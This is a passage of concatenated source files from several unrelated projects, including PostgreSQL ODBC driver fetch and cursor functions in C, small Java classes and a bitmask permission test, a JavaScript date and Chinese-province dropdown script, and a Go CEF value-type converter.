SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
SC_clear_error(stmt);
if ( ! (res = stmt->result)) {
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Null statement result in SQLFetch.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
/* Not allowed to bind a bookmark column when using SQLFetch. */
if ( stmt->bookmark.buffer) {
SC_set_error(stmt, STMT_COLNUM_ERROR, "Not allowed to bind a bookmark column when using SQLFetch");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (stmt->status == STMT_EXECUTING) {
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Can't fetch while statement is still executing.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (stmt->status != STMT_FINISHED) {
SC_set_error(stmt, STMT_STATUS_ERROR, "Fetch can only be called after the successful execution on a SQL statement");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (stmt->bindings == NULL) {
/* just to avoid a crash if the user insists on calling this */
/* function even if SQL_ExecDirect has reported an Error */
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Bindings were not allocated properly.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
QR_set_rowset_size(res, 1);
QR_inc_base(res, stmt->last_fetch_count);
return SC_fetch(stmt);
}
RETCODE SQL_API SQLFetch(
HSTMT hstmt)
{
return PG_SQLFetch( hstmt );
}
/* This fetchs a block of data (rowset). */
SQLRETURN SQLExtendedFetch(
SQLHSTMT hstmt,
SQLUSMALLINT fFetchType,
SQLLEN irow,
SQLULEN *pcrow,
SQLUSMALLINT *rgfRowStatus)
{
static char* const func = "SQLExtendedFetch";
StatementClass *stmt = (StatementClass *) hstmt;
QResultClass *res;
int num_tuples, i, save_rowset_size;
RETCODE result;
char truncated, error;
mylog("SQLExtendedFetch: stmt=%u\n", stmt);
if ( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
if ( globals.use_declarefetch && ! stmt->manual_result) {
if ( fFetchType != SQL_FETCH_NEXT) {
SC_set_error(stmt, STMT_NOT_IMPLEMENTED_ERROR, "Unsupported fetch type for SQLExtendedFetch with UseDeclareFetch option.");
return SQL_ERROR;
}
}
SC_clear_error(stmt);
if ( ! (res = stmt->result)) {
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Null statement result in SQLExtendedFetch.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
/* If a bookmark colunmn is bound but bookmark usage is off, then error */
if (stmt->bookmark.buffer && stmt->options.use_bookmarks == SQL_UB_OFF) {
SC_set_error(stmt, STMT_COLNUM_ERROR, "Attempt to retrieve bookmark with bookmark usage disabled");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (stmt->status == STMT_EXECUTING) {
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Can't fetch while statement is still executing.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (stmt->status != STMT_FINISHED) {
SC_set_error(stmt, STMT_STATUS_ERROR, "ExtendedFetch can only be called after the successful execution on a SQL statement");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (stmt->bindings == NULL) {
/* just to avoid a crash if the user insists on calling this */
/* function even if SQL_ExecDirect has reported an Error */
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Bindings were not allocated properly.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
/* Initialize to no rows fetched */
if (rgfRowStatus)
for (i = 0; i < stmt->options.rowset_size; i++)
*(rgfRowStatus + i) = SQL_ROW_NOROW;
if (pcrow)
*pcrow = 0;
num_tuples = QR_get_num_tuples(res);
/* Save and discard the saved rowset size */
save_rowset_size = stmt->save_rowset_size;
stmt->save_rowset_size = -1;
switch (fFetchType) {
case SQL_FETCH_NEXT:
/* From the odbc spec... If positioned before the start of the RESULT SET,
then this should be equivalent to SQL_FETCH_FIRST.
*/
if (stmt->rowset_start < 0)
stmt->rowset_start = 0;
else {
stmt->rowset_start += (save_rowset_size > 0 ? save_rowset_size : stmt->options.rowset_size);
}
mylog("SQL_FETCH_NEXT: num_tuples=%d, currtuple=%d\n", num_tuples, stmt->currTuple);
break;
case SQL_FETCH_PRIOR:
mylog("SQL_FETCH_PRIOR: num_tuples=%d, currtuple=%d\n", num_tuples, stmt->currTuple);
/* From the odbc spec... If positioned after the end of the RESULT SET,
then this should be equivalent to SQL_FETCH_LAST.
*/
if (stmt->rowset_start >= num_tuples) {
stmt->rowset_start = num_tuples <= 0 ? 0 : (num_tuples - stmt->options.rowset_size);
}
else {
stmt->rowset_start -= stmt->options.rowset_size;
}
break;
case SQL_FETCH_FIRST:
mylog("SQL_FETCH_FIRST: num_tuples=%d, currtuple=%d\n", num_tuples, stmt->currTuple);
stmt->rowset_start = 0;
break;
case SQL_FETCH_LAST:
mylog("SQL_FETCH_LAST: num_tuples=%d, currtuple=%d\n", num_tuples, stmt->currTuple);
stmt->rowset_start = num_tuples <= 0 ? 0 : (num_tuples - stmt->options.rowset_size) ;
break;
case SQL_FETCH_ABSOLUTE:
mylog("SQL_FETCH_ABSOLUTE: num_tuples=%d, currtuple=%d, irow=%d\n", num_tuples, stmt->currTuple, irow);
/* Position before result set, but dont fetch anything */
if (irow == 0) {
stmt->rowset_start = -1;
stmt->currTuple = -1;
return SQL_NO_DATA_FOUND;
}
/* Position before the desired row */
else if (irow > 0) {
stmt->rowset_start = irow - 1;
}
/* Position with respect to the end of the result set */
else {
stmt->rowset_start = num_tuples + irow;
}
break;
case SQL_FETCH_RELATIVE:
/* Refresh the current rowset -- not currently implemented, but lie anyway */
if (irow == 0) {
break;
}
stmt->rowset_start += irow;
break;
case SQL_FETCH_BOOKMARK:
stmt->rowset_start = irow - 1;
break;
default:
SC_log_error(func, "Unsupported SQLExtendedFetch Direction", stmt);
return SQL_ERROR;
}
/***********************************/
/* CHECK FOR PROPER CURSOR STATE */
/***********************************/
/* Handle Declare Fetch style specially because the end is not really the end... */
if ( globals.use_declarefetch && ! stmt->manual_result) {
if (QR_end_tuples(res)) {
return SQL_NO_DATA_FOUND;
}
}
else {
/* If *new* rowset is after the result_set, return no data found */
if (stmt->rowset_start >= num_tuples) {
stmt->rowset_start = num_tuples;
return SQL_NO_DATA_FOUND;
}
}
/* If *new* rowset is prior to result_set, return no data found */
if (stmt->rowset_start < 0) {
if (stmt->rowset_start + stmt->options.rowset_size <= 0) {
stmt->rowset_start = -1;
return SQL_NO_DATA_FOUND;
}
else { /* overlap with beginning of result set, so get first rowset */
stmt->rowset_start = 0;
}
}
/* currTuple is always 1 row prior to the rowset */
stmt->currTuple = stmt->rowset_start - 1;
/* increment the base row in the tuple cache */
QR_set_rowset_size(res, stmt->options.rowset_size);
QR_inc_base(res, stmt->last_fetch_count);
/* Physical Row advancement occurs for each row fetched below */
mylog("SQLExtendedFetch: new currTuple = %d\n", stmt->currTuple);
truncated = error = FALSE;
for (i = 0; i < stmt->options.rowset_size; i++) {
stmt->bind_row = i; /* set the binding location */
result = SC_fetch(stmt);
/* Determine Function status */
if (result == SQL_NO_DATA_FOUND)
break;
else if (result == SQL_SUCCESS_WITH_INFO)
truncated = TRUE;
else if (result == SQL_ERROR)
error = TRUE;
/* Determine Row Status */
if (rgfRowStatus) {
if (result == SQL_ERROR)
*(rgfRowStatus + i) = SQL_ROW_ERROR;
else
*(rgfRowStatus + i)= SQL_ROW_SUCCESS;
}
}
/* Save the fetch count for SQLSetPos */
stmt->last_fetch_count= i;
/* Reset next binding row */
stmt->bind_row = 0;
/* Move the cursor position to the first row in the result set. */
stmt->currTuple = stmt->rowset_start;
/* For declare/fetch, need to reset cursor to beginning of rowset */
if (globals.use_declarefetch && ! stmt->manual_result) {
QR_set_position(res, 0);
}
/* Set the number of rows retrieved */
if (pcrow)
*pcrow = i;
if (i == 0)
return SQL_NO_DATA_FOUND; /* Only DeclareFetch should wind up here */
else if (error)
return SQL_ERROR;
else if (truncated)
return SQL_SUCCESS_WITH_INFO;
else
return SQL_SUCCESS;
}
/* This determines whether there are more results sets available for */
/* the "hstmt". */
/* CC: return SQL_NO_DATA_FOUND since we do not support multiple result sets */
RETCODE SQL_API SQLMoreResults(
HSTMT hstmt)
{
return SQL_NO_DATA_FOUND;
}
/* This positions the cursor within a rowset, that was positioned using SQLExtendedFetch. */
/* This will be useful (so far) only when using SQLGetData after SQLExtendedFetch. */
RETCODE SQL_API SQLSetPos(
HSTMT hstmt,
SQLSETPOSIROW irow,
UWORD fOption,
UWORD fLock)
{
static char* const func = "SQLSetPos";
StatementClass *stmt = (StatementClass *) hstmt;
QResultClass *res;
int num_cols, i;
BindInfoClass *bindings = stmt->bindings;
if ( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
if (fOption != SQL_POSITION && fOption != SQL_REFRESH) {
SC_set_error(stmt, STMT_NOT_IMPLEMENTED_ERROR, "Only SQL_POSITION/REFRESH is supported for SQLSetPos");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if ( ! (res = stmt->result)) {
SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Null statement result in SQLSetPos.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
num_cols = QR_NumResultCols(res);
if (irow == 0) {
SC_set_error(stmt, STMT_ROW_OUT_OF_RANGE, "Driver does not support Bulk operations.");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
if (irow > stmt->last_fetch_count) {
SC_set_error(stmt, STMT_ROW_OUT_OF_RANGE, "Row value out of range");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
irow--;
/* Reset for SQLGetData */
for (i = 0; i < num_cols; i++)
bindings[i].data_left = -1;
QR_set_position(res, irow);
stmt->currTuple = stmt->rowset_start + irow;
return SQL_SUCCESS;
}
/* Sets options that control the behavior of cursors. */
SQLRETURN SQLSetScrollOptions( /* Use SQLSetStmtOptions */
SQLHSTMT hstmt,
SQLUSMALLINT fConcurrency,
SQLLEN crowKeyset,
SQLUSMALLINT crowRowset)
{
static char* const func = "SQLSetScrollOptions";
SC_log_error(func, "Function not implemented", (StatementClass *) hstmt);
return SQL_ERROR;
}
/* Set the cursor name on a statement handle */
RETCODE SQL_API SQLSetCursorName(
HSTMT hstmt,
UCHAR FAR *szCursor,
SWORD cbCursor)
{
static char* const func="SQLSetCursorName";
StatementClass *stmt = (StatementClass *) hstmt;
int len;
mylog("SQLSetCursorName: hstmt=%u, szCursor=%u, cbCursorMax=%d\n", hstmt, szCursor, cbCursor);
if ( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
len = (cbCursor == SQL_NTS) ? strlen((char*)szCursor) : cbCursor;
if (len <= 0 || len > sizeof(stmt->cursor_name) - 1) {
SC_set_error(stmt, STMT_INVALID_CURSOR_NAME, "Invalid Cursor Name");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
strncpy_null((char*)stmt->cursor_name, (char*)szCursor, len+1);
return SQL_SUCCESS;
}
/* Return the cursor name for a statement handle */
RETCODE SQL_API SQLGetCursorName(
HSTMT hstmt,
UCHAR FAR *szCursor,
SWORD cbCursorMax,
SWORD FAR *pcbCursor)
{
static char* const func="SQLGetCursorName";
StatementClass *stmt = (StatementClass *) hstmt;
int len = 0;
RETCODE result;
mylog("SQLGetCursorName: hstmt=%u, szCursor=%u, cbCursorMax=%d, pcbCursor=%u\n", hstmt, szCursor, cbCursorMax, pcbCursor);
if ( ! stmt) {
SC_log_error(func, "", NULL);
return SQL_INVALID_HANDLE;
}
if ( stmt->cursor_name[0] == '\0') {
SC_set_error(stmt, STMT_NO_CURSOR_NAME, "No Cursor name available");
SC_log_error(func, "", stmt);
return SQL_ERROR;
}
result = SQL_SUCCESS;
len = strlen(stmt->cursor_name);
if (szCursor) {
strncpy_null((char*)szCursor, (char*)stmt->cursor_name, cbCursorMax);
if (len >= cbCursorMax) {
result = SQL_SUCCESS_WITH_INFO;
SC_set_error(stmt, STMT_TRUNCATED, "The buffer was too small for the result.");
}
}
if (pcbCursor)
*pcbCursor = len;
return result;
}
|
BantorSchwanzVor/plotscanner-leak
|
org/newdawn/slick/svg/Loader.java
|
<gh_stars>0
package org.newdawn.slick.svg;
import org.newdawn.slick.geom.Transform;
import org.w3c.dom.Element;
public interface Loader {
void loadChildren(Element paramElement, Transform paramTransform) throws ParsingException;
}
/* Location: C:\Users\BSV\AppData\Local\Temp\Rar$DRa6216.20396\Preview\Preview.jar!\org\newdawn\slick\svg\Loader.class
* Java compiler version: 8 (52.0)
* JD-Core Version: 1.1.3
*/
|
jc-lab/sipc
|
java/src/main/java/kr/jclab/javautils/sipc/ProcessSipcHost.java
|
<filename>java/src/main/java/kr/jclab/javautils/sipc/ProcessSipcHost.java
package kr.jclab.javautils.sipc;
import kr.jclab.javautils.sipc.channel.ChannelHost;
import kr.jclab.javautils.sipc.crypto.CryptoException;
import kr.jclab.javautils.sipc.crypto.DefaultEphemeralKeyAlgorithmsFactory;
import kr.jclab.javautils.sipc.crypto.EphemeralKeyAlgorithmFactory;
import java.io.IOException;
import java.io.InputStream;
import java.util.concurrent.Executor;
public class ProcessSipcHost extends SipcHost {
protected Process process = null;
protected ProcessSipcHost(
ChannelHost channelHost,
EphemeralKeyAlgorithmFactory keyPairGenerator,
Executor executor
) throws CryptoException {
super(channelHost, keyPairGenerator, executor);
}
public void attachProcess(Process process) {
this.process = process;
this.ioThread.start();
}
private final Thread ioThread = new Thread(() -> {
try {
while (this.process.isAlive()) {
Thread.sleep(1000);
}
this.feedDone();
} catch (InterruptedException e) {
this.feedError(e);
}
});
public static Builder builder(ChannelHost channelHost) {
return new Builder(channelHost);
}
public static class Builder {
private final ChannelHost channelHost;
private EphemeralKeyAlgorithmFactory keyPairGenerator = null;
private Executor executor = null;
public Builder(ChannelHost channelHost) {
this.channelHost = channelHost;
}
public Builder keyPairGenerator(EphemeralKeyAlgorithmFactory keyPairGenerator) {
this.keyPairGenerator = keyPairGenerator;
return this;
}
public Builder executor(Executor executor) {
this.executor = executor;
return this;
}
public ProcessSipcHost build() throws CryptoException {
if (this.keyPairGenerator == null) {
this.keyPairGenerator = DefaultEphemeralKeyAlgorithmsFactory.getInstance();
}
return new ProcessSipcHost(
this.channelHost,
this.keyPairGenerator,
this.executor
);
}
}
}
|
manoj-gk/tr069simulator
|
src/main/java/org/dslforum/cwmp_1_0/SetVouchers.java
|
package org.dslforum.cwmp_1_0;
/**
* SetVouchers message - Annex A.4.1.3
*
* Schema fragment(s) for this class:
* <pre>
* <xs:element xmlns:ns="urn:dslforum-org:cwmp-1-0" xmlns:xs="http://www.w3.org/2001/XMLSchema" name="SetVouchers">
* <xs:complexType>
* <xs:sequence>
* <xs:element type="ns:VoucherList" name="VoucherList"/>
* </xs:sequence>
* </xs:complexType>
* </xs:element>
* </pre>
*/
public class SetVouchers
{
private VoucherList voucherList;
/**
* Get the 'VoucherList' element value.
*
* @return value
*/
public VoucherList getVoucherList() {
return voucherList;
}
/**
* Set the 'VoucherList' element value.
*
* @param voucherList
*/
public void setVoucherList(VoucherList voucherList) {
this.voucherList = voucherList;
}
}
|
skiyooka/blackduck-alert
|
alert-common/src/test/java/com/synopsys/integration/alert/common/enumeration/AccessOperationTest.java
|
package com.synopsys.integration.alert.common.enumeration;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNotEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;
import org.junit.jupiter.api.Test;
import com.synopsys.integration.alert.common.util.BitwiseUtil;
public class AccessOperationTest {
@Test
public void validPermissionCheckTest() {
int create = 1;
int delete = 2;
int deleteAndCreate = 3;
assertTrue(AccessOperation.CREATE.isPermitted(create));
assertTrue(AccessOperation.DELETE.isPermitted(delete));
assertTrue(AccessOperation.CREATE.isPermitted(deleteAndCreate) && AccessOperation.DELETE.isPermitted(deleteAndCreate));
assertFalse(AccessOperation.CREATE.isPermitted(delete));
assertFalse(AccessOperation.EXECUTE.isPermitted(create));
}
@Test
public void verifyBitsTest() {
assertEquals(1, AccessOperation.CREATE.getBit());
assertEquals(2, AccessOperation.DELETE.getBit());
assertEquals(4, AccessOperation.READ.getBit());
assertEquals(8, AccessOperation.WRITE.getBit());
assertEquals(16, AccessOperation.EXECUTE.getBit());
assertEquals(32, AccessOperation.UPLOAD_FILE_READ.getBit());
assertEquals(64, AccessOperation.UPLOAD_FILE_WRITE.getBit());
assertEquals(128, AccessOperation.UPLOAD_FILE_DELETE.getBit());
assertNotEquals(2, AccessOperation.CREATE.getBit());
}
@Test
public void verifyAddingOperationsTest() {
int noPermissions = 0;
for (AccessOperation accessOperation : AccessOperation.values()) {
assertFalse(accessOperation.isPermitted(noPermissions));
}
int newPermissions = noPermissions;
newPermissions = BitwiseUtil.combineBits(newPermissions, AccessOperation.CREATE.getBit());
newPermissions = BitwiseUtil.combineBits(newPermissions, AccessOperation.EXECUTE.getBit());
assertTrue(AccessOperation.CREATE.isPermitted(newPermissions));
assertTrue(AccessOperation.EXECUTE.isPermitted(newPermissions));
assertFalse(AccessOperation.DELETE.isPermitted(newPermissions));
}
@Test
public void verifyRemovingOperationsTest() {
int allPermissions = 255;
for (AccessOperation accessOperation : AccessOperation.values()) {
assertTrue(accessOperation.isPermitted(allPermissions));
}
int newPermissions = allPermissions;
newPermissions = BitwiseUtil.removeBits(newPermissions, AccessOperation.CREATE.getBit());
newPermissions = BitwiseUtil.removeBits(newPermissions, AccessOperation.DELETE.getBit());
assertFalse(AccessOperation.CREATE.isPermitted(newPermissions));
assertFalse(AccessOperation.DELETE.isPermitted(newPermissions));
assertTrue(AccessOperation.EXECUTE.isPermitted(newPermissions));
}
}
|
shenzeyu/recommend
|
src/main/webapp/scripts/front/clients_js/information1.js
|
<gh_stars>0
function onloading(){
strYear = document.formID.year.outerHTML;
strMonth = document.formID.month.outerHTML;
strDay = document.formID.day.outerHTML;
MonHead = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31];
//先给年下拉框赋内容
var year = new Date().getFullYear();
var str = strYear.substring(0, strYear.length - 9);
for (var i = (year-30); i < (year+30); i++) //以今年为准,前30年,后30年
{
str += "<option value='" + i + "'> " + i + " 年" + "</option>\r\n";
}
document.formID.year.outerHTML = str+"</select>";
//赋月份的下拉框
var str = strMonth.substring(0, strMonth.length - 9);
for (var i = 1; i < 13; i++)
{
str += "<option value='" + i + "'> " + i + " 月" + "</option>\r\n";
}
document.formID.month.outerHTML = str+"</select>";
document.formID.year.value = year;
document.formID.month.value = new Date().getMonth() + 1;
var n = MonHead[new Date().getMonth()];
if (new Date().getMonth() == 1 && IsPinYear(Yearvalue)) n++;
writeDay(n); //赋日期下拉框
document.formID.day.value = new Date().getDate();
}
function YearMonth(str){
//年发生变化时日期发生变化(主要是判断闰平年)
var Monthvalue = document.month.options[document.month.selectedIndex].value;
if(Monthvalue == ""){
day.outerHTML = strDay;
return;
}
var n = MonHead[Monthvalue - 1];
if (Monthvalue == 2 && IsPinYear(str)) n++;
writeDay(n);
}
function MonthDay(str){
//月发生变化时日期联动
var Yearvalue = document.year.options[document.year.selectedIndex].value;
if (str == ""){
day.outerHTML = strDay;
return;
}
var n = MonHead[str - 1];
if (str ==2 && IsPinYear(Yearvalue)) n++;
writeDay(n);
}
function writeDay(n){
//据条件写日期的下拉框
var s = strDay.substring(0, strDay.length - 9);
for (var i=1; i<(n+1); i++)
s += "<option value='" + i + "'> " + i + " 日" + "</option>\r\n";
document.formID.day.outerHTML = s +"</select>";
}
function IsPinYear(year){
alert("11111111");
//判断是否闰平年
return (0 == year%4 && (year%100 !=0 || year%400 == 0));
}
var Cities = {
'北京市':['市辖区','所属县'],
'天津市':['市辖区','所属县'],
'河北省':['石家庄市','唐山市','秦皇岛市','邯郸市','邢台市','保定市','张家口市','承德市','沧州市','廊坊市','衡水市'],
'福建省':['福州市','厦门市','莆田市','三明市','泉州市','漳州市','南平市','龙岩市','宁德地区'],
'上海市':['市辖区','所属县'],
'江苏省':['南京市','无锡市','徐州市','常州市','苏州市','南通市','连云港市','淮阴市','盐城市','扬州市','镇江市','泰州市','宿迁市'],
'内蒙古自治区':['呼和浩特市','包头市','乌海市','赤峰市','呼伦贝尔盟','兴安盟','哲里木盟','锡林郭勒盟','乌兰察布盟','伊克昭盟','巴彦淖尔盟','阿拉善盟'],
'浙江省':['杭州市','宁波市','温州市','嘉兴市','湖州市','绍兴市','金华市','衢州市','舟山市','台州市','丽水地区'],
'山西省':['太原市','大同市','阳泉市','长治市','晋城市','朔州市','忻州地区','吕梁地区','晋中地区','临汾地区','运城地区'],
'辽宁省':['沈阳市','大连市','鞍山市','抚顺市','本溪市','丹东市','锦州市','营口市','阜新市','辽阳市','盘锦市','铁岭市','朝阳市','葫芦岛市'],
'吉林省':['长春市','吉林市','四平市','辽源市','通化市','白山市','松原市','白城市','延边朝鲜族自治州'],
'黑龙江省':['哈尔滨市','齐齐哈尔市','鸡西市','鹤岗市','双鸭山市','大庆市','伊春市','佳木斯市','七台河市','牡丹江市','黑河市','绥化地区','大兴安岭地区'],
'安徽省':['合肥市','芜湖市','蚌埠市','淮南市','马鞍山市','淮北市','铜陵市','安庆市','黄山市','滁州市','阜阳市','宿州市','六安地区','宣城地区','巢湖地区','池州地区'],
'广西壮族自治区':['南宁市','柳州市','桂林市','梧州市','北海市','防城港市','钦州市','贵港市','玉林市','南宁地区','柳州地区','贺州地区','百色地区','河池地区'],
'河南省':['郑州市','开封市','洛阳市','平顶山市','安阳市','鹤壁市','新乡市','焦作市','濮阳市','许昌市','漯河市','三门峡市','南阳市','商丘市','信阳市','周口地区','驻马店地区'],
'湖北省':['武汉市','黄石市','十堰市','宜昌市','襄樊市','鄂州市','荆门市','孝感市','荆州市','黄冈市','咸宁市','恩施土家族苗族自治州','省直辖县级行政单位'],
'湖南省':['长沙市','株洲市','湘潭市','衡阳市','邵阳市','岳阳市','常德市','张家界市','益阳市','郴州市','永州市','怀化市','娄底地区','湘西土家族苗族自治州'],
'江西省':['南昌市','景德镇市','萍乡市','九江市','新余市','鹰潭市','赣州市','瑞金市','兴国县','于都县','宁都县','宜春地区','上饶地区','吉安地区','抚州地区'],
'山东省':['济南市','青岛市','淄博市','枣庄市','东营市','烟台市','潍坊市','济宁市','泰安市','威海市','日照市','莱芜市','临沂市','德州市','聊城市','滨州地区','菏泽地区'],
'广东省':['广州市','韶关市','深圳市','珠海市','汕头市','佛山市','江门市','湛江市','茂名市','肇庆市','惠州市','梅州市','汕尾市','河源市','阳江市','清远市','东莞市','中山市','潮州市','揭阳市','云浮市'],
'陕西省':['西安市','铜川市','宝鸡市','咸阳市','渭南市','延安市','汉中市','安康地区','商洛地区','榆林地区'],
'甘肃省':['兰州市','嘉峪关市','金昌市','白银市','天水市','酒泉地区','张掖地区','武威地区','定西地区','陇南地区','平凉地区','庆阳地区','临夏回族自治州','甘南藏族自治州'],
'贵州省':['贵阳市','六盘水市','遵义市','铜仁地区','南布依族苗族自治州','毕节地区','安顺地区','黔东南苗族侗族自治州','黔南布依族苗族自治州'],
'青海省':['西宁市','海东地区','海北藏族自治州','黄南藏族自治州','海南藏族自治州','果洛藏族自治州','玉树藏族自治州','海西蒙古族藏族自治州'],
'海南省':['省所属市、县、岛','海口市','三亚市'],
'重庆市':['市辖区','所属县'],
'四川省':['成都市','自贡市','攀枝花市','泸州市','德阳市','绵阳市','广元市','遂宁市','内江市','乐山市','南充市','宜宾市','广安市','达川地区','雅安地区','阿坝藏族羌族自治州','甘孜藏族自治州','凉山彝族自治州','巴中地区','眉山地区','资阳地区'],
'云南省':['昆明市','曲靖市','玉溪市','昭通地区','楚雄彝族自治州','红河哈尼族彝族自治州','文山壮族苗族自治州','思茅地区','西双版纳傣族自治州','大理白族自治州','保山地区','德宏傣族景颇族自治州','丽江地区','怒江傈僳族自治州','迪庆藏族自治州','临沧地区'],
'西藏自治区':['拉萨市','昌都地区','山南地区','日喀则地区','那曲地区','阿里地区','林芝地区'],
'宁夏回族自治区':['银川市','石嘴山市','吴忠市','固原地区'],
'新疆维吾尔自治区':['乌鲁木齐市','克拉玛依市','吐鲁番地区','哈密地区','昌吉回族自治州','博尔塔拉蒙古自治州','巴音郭楞蒙古自治州','阿克苏地区','克孜勒苏柯尔克孜自治州','喀什地区','和田地区','伊犁哈萨克自治州','伊犁地区','塔城地区','阿勒泰地区','自治区直辖县级行政单位'],
'台湾省':[''],
'香港特别行政区':[''],
'澳门特别行政区':['']
};
function SetProvince(SelectId){
var Select_Province = document.getElementById(SelectId);
if(Select_Province){
with(Select_Province){
if(citydata != null){
var leng = citydata.length;
for(var i=0;i<leng;i++){
if(citydata[i]["V"] != null){
options.add(new Option(citydata[i]["V"],citydata[i]["V"]));
}
}
}
}
}
}
function SetCity(SelectId, Province){
var Select_City = document.getElementById(SelectId);
if(Select_City){
with(Select_City){
var slen = options.length;
for(var i=0;i<slen;i++){
options[0] = null;
}
if(Cities[Province] == null)
return;
var len = Cities[Province].length;
for(var i=0;i<len;i++){
options[i] = new Option(Cities[Province][i],Cities[Province][i]);
}
}
}
}
function SetSection(ParentSelectId, SelectId, City){
var leng = citydata.length;
var Select_obj = document.getElementById(SelectId);
ClearOptions(SelectId, '','');
var province = $(ParentSelectId).value;
for(var i=0;i<leng;i++){
var obj = citydata[i]["C"];
if(province == "北京市" || province == "天津市" || province == "上海市" || province == "重庆市"){
if(province == citydata[i]["V"]){
var region = citydata[i]["C"];
var len1 = region.length;
for(var h=0;h<len1;h++){
Select_obj.options.add(new Option(region[h]["V"],region[h]["V"]));
}
}
}else{
var le = obj.length;
for(var j=0;j<le;j++){
if(obj[j]["V"] == City){
if(obj[j]["C"] != null){
var l = obj[j]["C"].length;
var obj2 = obj[j]["C"];
for(var k=0;k<l;k++){
Select_obj.options.add(new Option(obj2[k]["V"],obj2[k]["V"]));
}
}
}
}
}
}
}
|
kemokemo/beats
|
x-pack/filebeat/processors/decode_cef/cef/types.go
|
// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
// or more contributor license agreements. Licensed under the Elastic License;
// you may not use this file except in compliance with the Elastic License.
package cef
import (
"net"
"strconv"
"time"
"github.com/pkg/errors"
"github.com/elastic/beats/v7/libbeat/common"
)
// DataType specifies one of CEF data types.
type DataType uint8
// List of DataTypes.
const (
Unset DataType = iota
IntegerType
LongType
FloatType
DoubleType
StringType
BooleanType
IPType
MACAddressType
TimestampType
)
// ToType converts the given value string value to the specified data type.
func ToType(value string, typ DataType) (interface{}, error) {
switch typ {
case StringType:
return value, nil
case LongType:
return toLong(value)
case IntegerType:
return toInteger(value)
case FloatType:
return toFloat(value)
case DoubleType:
return toDouble(value)
case BooleanType:
return toBoolean(value)
case IPType:
return toIP(value)
case MACAddressType:
return toMACAddress(value)
case TimestampType:
return toTimestamp(value)
default:
return nil, errors.Errorf("invalid data type: %v", typ)
}
}
func toLong(v string) (int64, error) {
return strconv.ParseInt(v, 0, 64)
}
func toInteger(v string) (int32, error) {
i, err := strconv.ParseInt(v, 0, 32)
return int32(i), err
}
func toFloat(v string) (float32, error) {
f, err := strconv.ParseFloat(v, 32)
return float32(f), err
}
func toDouble(v string) (float64, error) {
f, err := strconv.ParseFloat(v, 64)
return f, err
}
func toBoolean(v string) (bool, error) {
return strconv.ParseBool(v)
}
func toIP(v string) (string, error) {
// This is validating that the value is an IP.
if net.ParseIP(v) != nil {
return v, nil
}
return "", errors.New("value is not a valid IP address")
}
// toMACAddress accepts a MAC addresses as hex characters separated by colon,
// dot, or dash. It returns lowercase hex characters separated by colons.
func toMACAddress(v string) (string, error) {
// CEF specifies that MAC addresses are colon separated, but this will be a
// little more liberal.
hw, err := net.ParseMAC(v)
if err != nil {
return "", err
}
return hw.String(), nil
}
var timeLayouts = []string{
// MMM dd HH:mm:ss.SSS zzz
"Jan _2 15:04:05.000 MST",
"Jan _2 15:04:05.000 Z0700",
"Jan _2 15:04:05.000 Z07:00",
"Jan _2 15:04:05.000 GMT-07:00",
// MMM dd HH:mm:sss.SSS
"Jan _2 15:04:05.000",
// MMM dd HH:mm:ss zzz
"Jan _2 15:04:05 MST",
"Jan _2 15:04:05 Z0700",
"Jan _2 15:04:05 Z07:00",
"Jan _2 15:04:05 GMT-07:00",
// MMM dd HH:mm:ss
"Jan _2 15:04:05",
// MMM dd yyyy HH:mm:ss.SSS zzz
"Jan _2 2006 15:04:05.000 MST",
"Jan _2 2006 15:04:05.000 Z0700",
"Jan _2 2006 15:04:05.000 Z07:00",
"Jan _2 2006 15:04:05.000 GMT-07:00",
// MMM dd yyyy HH:mm:ss.SSS
"Jan _2 2006 15:04:05.000",
// MMM dd yyyy HH:mm:ss zzz
"Jan _2 2006 15:04:05 MST",
"Jan _2 2006 15:04:05 Z0700",
"Jan _2 2006 15:04:05 Z07:00",
"Jan _2 2006 15:04:05 GMT-07:00",
// MMM dd yyyy HH:mm:ss
"Jan _2 2006 15:04:05",
}
func toTimestamp(v string) (common.Time, error) {
if unixMs, err := toLong(v); err == nil {
return common.Time(time.Unix(0, unixMs*int64(time.Millisecond))), nil
}
for _, layout := range timeLayouts {
ts, err := time.ParseInLocation(layout, v, time.UTC)
if err == nil {
// Use current year if no year is zero.
if ts.Year() == 0 {
currentYear := time.Now().In(ts.Location()).Year()
ts = ts.AddDate(currentYear, 0, 0)
}
return common.Time(ts), nil
}
}
return common.Time(time.Time{}), errors.New("value is not a valid timestamp")
}
|
opensrp/opensrp-client-sid
|
opensrp-vaksinator/src/main/java/org/smartregister/vaksinator/sync/UpdateActionsTask.java
|
package org.smartregister.vaksinator.sync;
import android.content.Context;
import android.util.Log;
import org.smartregister.vaksinator.service.SyncService;
import util.ServiceTools;
import static org.smartregister.util.Log.logInfo;
